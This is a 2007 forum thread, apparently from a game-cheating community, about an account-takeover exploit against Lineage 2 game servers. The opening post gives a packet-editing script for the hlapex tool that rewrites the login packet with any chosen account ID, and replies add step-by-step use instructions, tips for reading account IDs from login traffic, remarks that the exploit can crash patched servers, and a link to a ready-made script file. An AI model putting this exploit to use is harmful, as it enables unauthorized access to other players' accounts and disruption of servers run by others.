hlapex2008 Posted April 17, 2007 Posted April 17, 2007 A new xploit is avaible and allow an user to join to any account without know the user and password, you only need to know the account id. this is the code that allows that with hlapex you only change account with id you want to try const account=1; procedure Init; begin end; procedure Free; begin end; begin if FromServer then exit; if pck[1]=#$08 then begin buf:=#$08; WriteS(''); WriteD(account); WriteD(0); pck:=buf; end; end.
dublin555 Posted April 17, 2007 Posted April 17, 2007 but when need to send this code? and with what program? hlapex? i heard about this bug , but a little anower method
Maxtor Posted April 17, 2007 Posted April 17, 2007 A new xploit is avaible and allow an user to join to any account without know the user and password, you only need to know the account id. this is the code that allows that with amped you only change account with id you want to try const account=1; procedure Init; begin end; procedure Free; begin end; begin if FromServer then exit; if pck[1]=#$08 then begin buf:=#$08; WriteS(''); WriteD(account); WriteD(0); pck:=buf; end; end. at last someone has released it! nice share. Sticky. @dublin555: Yes you need hlapex,send this code when you see the character menu, before login.
dublin555 Posted April 17, 2007 Posted April 17, 2007 i'm a newbie with hlapex , can you make screen where to put and where press to send , i know how to send nly packets
hlapex2008 Posted April 17, 2007 Author Posted April 17, 2007 A new xploit is avaible and allow an user to join to any account without know the user and password, you only need to know the account id. this is the code that allows that with amped you only change account with id you want to try const account=1; procedure Init; begin end; procedure Free; begin end; begin if FromServer then exit; if pck[1]=#$08 then begin buf:=#$08; WriteS(''); WriteD(account); WriteD(0); pck:=buf; end; end. at last someone has released it! nice share. Sticky. @dublin555: Yes you need hlapex,send this code when you see the character menu, before login. Not when you see character menu, that dont work, with this code you only need to do the next: 1. Execute Hlapex 2. Load that code 3. Execute L2 4. Log with any account you have And woala, you would see the characters from that account if you send the packet 08 after see the character selection screen it wouldnt work Some servers have it fixed, but most of them not, dead to noobs admins. Some servers use the fix of change the id of the accounts, 99% of them use the script like has been shared, you know the new ids (-beep-1ng n00bs admins). For those who change the range to another one, when you log you get your account id in hex format RequestAuthLogin LoginName: accountname PlayKey2: F8020000 <--- This is the account id PlayKey1: 0C000000 LoginKey1: F8020000 <--- This is the account id LoginKey2: EB655315
dublin555 Posted April 17, 2007 Posted April 17, 2007 if pck[1]=#$08 then - here i need change 1 for accout ID?
hlapex2008 Posted April 17, 2007 Author Posted April 17, 2007 if pck[1]=#$08 then - here i need change 1 for accout ID? dam, f:ck1ng noob cheaters here --> account=1; I forgot to say most of the server where is fixed each time someone try to use it the server crash!
Maxtor Posted April 17, 2007 Posted April 17, 2007 Not when you see character menu, that dont work, with this code you only need to do the next: 1. Execute Hlapex 2. Load that code 3. Execute L2 4. Log with any account you have And woala, you would see the characters from that account scripts makes life easier!
MewMew Posted April 17, 2007 Posted April 17, 2007 so i make a script with this and all i do is to send this script with hlapex??and if so where do i pute the id with which i want to login?could any1 make ay sort video so that simple ppl can gbet it too;)
boever Posted April 17, 2007 Posted April 17, 2007 Thanks for releasing someth usefull again .. been waiting for a while ;) Well.. i have no exp with syntax's used in that script , but when i try to use it with hlapex i get the message that 'buf:' isn't declared. So how do i declare this .. or what can i do about this to fix it? And for MewMew , i guess u change "account" by ur ID u want to try. > WriteD(account);
baron Posted April 17, 2007 Posted April 17, 2007 its a bit complicated or i didnt catch it. ok u load the script, u load apex ,u load l2. here is my first question: what do u mean by :log with any account u have??? if i am right u mean that u use your account name to login??? then what?? u run the script and........??? and by the way could someone specify which id code u should change.i think its some code from the script but which one???
killer_007 Posted April 17, 2007 Posted April 17, 2007 Here it is: const account=Here you put the id you wish to login to; procedure Init; begin end; procedure Free; begin end; begin if FromServer then exit; if pck[1]=#$08 then begin buf:=#$08; WriteS(''); WriteD(account); WriteD(0); pck:=buf; end; end. You put the script in the scripts folder (open a script, edit it, and save it with a different name) Open hlapex.exe Now run l2.exe When you get to the login screen ~> Go to scripts tab, press load, select the script you just saved. Press CALL INIT. In hlapex of course... Now login with one of your accounts (just make a new one, and change your ip before doing it, if you have a main account there :P) If you login normally till the chars window, it is OK!!!!! YOU OWNED THEM!!! If not, when you press the selection of the server, you will simply get disconnected or you will crash the server (if they have that old noobish fix :P) Just have fun.... Oh, i had heard of this a loooong time ago, and many servers (mostly russians) got owned :P It is fixed like 99% (only some servers that their admin doesn't even know what does amped mean have this till working...) FOR SOME NEWBIES, IT IS FOR OFFICIAL SERVERS, NOT FOR JAVA ONEEEEEEEEEEEEEEEEEEES (C4, if you don't get that way, not C5).
Guest MaxBastards Posted April 17, 2007 Posted April 17, 2007 Here is ready the file http://www.4shared.com/file/14253700/fbcd31e8/login.html but someone check it because the off server im playing is down! plz check it and release it! and this file on scripts on hlapex files! :P
Recommended Posts